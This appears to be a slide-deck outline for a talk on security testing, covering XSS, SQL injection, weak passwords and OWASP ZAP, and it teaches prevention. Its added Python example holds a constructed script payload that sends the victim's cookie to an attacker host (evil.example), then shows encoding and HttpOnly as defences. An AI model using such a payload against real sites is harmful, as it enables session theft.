Security Testing: Operation Vijay
What is hacking?
Hackers
Types of Hackers
● Ethical hackers
● Crackers
Define
Security testing is testing that aims to uncover vulnerabilities in a system and to confirm that its data and resources are protected from intruders.
Types of Security Testing
● Infrastructure security testing
● Application security testing
When?
Security Testing Vocabulary
● Reconnaissance / information gathering
● Vulnerability
● Exploit
Reconnaissance: Demo
Reconnaissance: Mission
P@ssw04d
Default / Weak Passwords
Password Vaults
Demo
Cross Site Scripting (XSS)
Client-side injection attack
Types:
● Reflected XSS
● Stored XSS
● DOM-based XSS
Reflected XSS: Demo
Reflected XSS: Mission
Stored XSS: Demo
Stored XSS: Mission
XSS Prevention
● Never place user input into a page as-is
● Output encoding, chosen for the context the data lands in (HTML body, attribute, JavaScript, URL)
● X-XSS-Protection response header (a legacy browser filter; current browsers no longer honour it, so it is not a substitute for encoding)
● HttpOnly flag on the session cookie (Set-Cookie): it does not stop the injection, but it keeps injected script from reading the cookie via document.cookie
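The reflected XSS case above and the prevention slide, as one added example that is not from the original slides. A constructed "search page" echoes a query parameter back into the HTML body; the first version reflects the raw value, the second HTML-encodes it for the body context, and a Set-Cookie helper shows the HttpOnly flag. The hostnames, the payload and the session id are all constructed for illustration.

```python
"""Reflected XSS: raw reflection vs. output encoding, plus an HttpOnly cookie.

Added example (not from the original slides). shop.example, evil.example,
PAYLOAD and the session id are constructed for illustration.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed attacker input: exfiltrates document.cookie to an attacker host.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
# The attacker sends the victim this crafted link (payload URL-encoded).
REQUEST_URL = "http://shop.example/search?q=" + quote(PAYLOAD)


def query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def search_page_vulnerable(url: str) -> str:
    """Reflects the raw parameter into the HTML body: the browser runs the script."""
    q = query_param(url, "q")
    return "<h1>Results for " + q + "</h1>"


def search_page_encoded(url: str) -> str:
    """Encodes the parameter for the HTML-body context before reflecting it.

    html.escape with quote=True turns < > & " ' into entities, so the payload
    is rendered as text instead of parsed as markup.
    """
    q = query_param(url, "q")
    return "<h1>Results for " + html.escape(q, quote=True) + "</h1>"


def contains_script_tag(page: str) -> bool:
    """Crude marker used only to show the difference: is a live <script> tag present?"""
    return "<script>" in page.lower()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line for a session cookie that injected script cannot read.

    HttpOnly does not prevent the XSS itself; it only denies document.cookie
    access, so the cookie-theft payload above would send an empty value.
    """
    return f"Set-Cookie: SESSIONID={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print("vulnerable:", search_page_vulnerable(REQUEST_URL))
    print("encoded:   ", search_page_encoded(REQUEST_URL))
    print(session_cookie_header("constructed-session-id"))
```

Encoding is context-specific: html.escape is right for the HTML body and for quoted attributes, but data dropped into a JavaScript block or a URL needs the encoding for that context instead.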
Popular XSS Attacks
SQL Injection
An attack in which SQL fragments supplied as user input are injected into a predefined query, changing what that query executes.
SQL Injection: Demo
SQL Injection Prevention
● Don't use user input directly in query text
● Use prepared statements (parameterized queries)
● Use stored procedures (only if they do not build dynamic SQL themselves)
● Use frameworks / ORMs that parameterize queries for you
ZAP (OWASP Zed Attack Proxy)
References
https://www.owasp.org
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
https://www.google.co.in/about/appsecurity/tools/
https://xkcd.com/327/
http://www.dvwa.co.uk/
https://www.amazon.in/Web-Application-Hackers-Handbook-Exploiting-ebook/dp/B005LVQA9S
https://google-gruyere.appspot.com
https://www.youtube.com/watch?v=lc7scxvKQOo
https://www.imperva.com/docs/wp_consumer_password_worst_practices.pdf
http://softwaretestingfundamentals.com/security-testing/
Thank you
Dhaval Doshi (@dhavaldoshi)
Lavanya Mohan (@LavanyaMohan210)
Shirish Padalkar (@_Garbage_)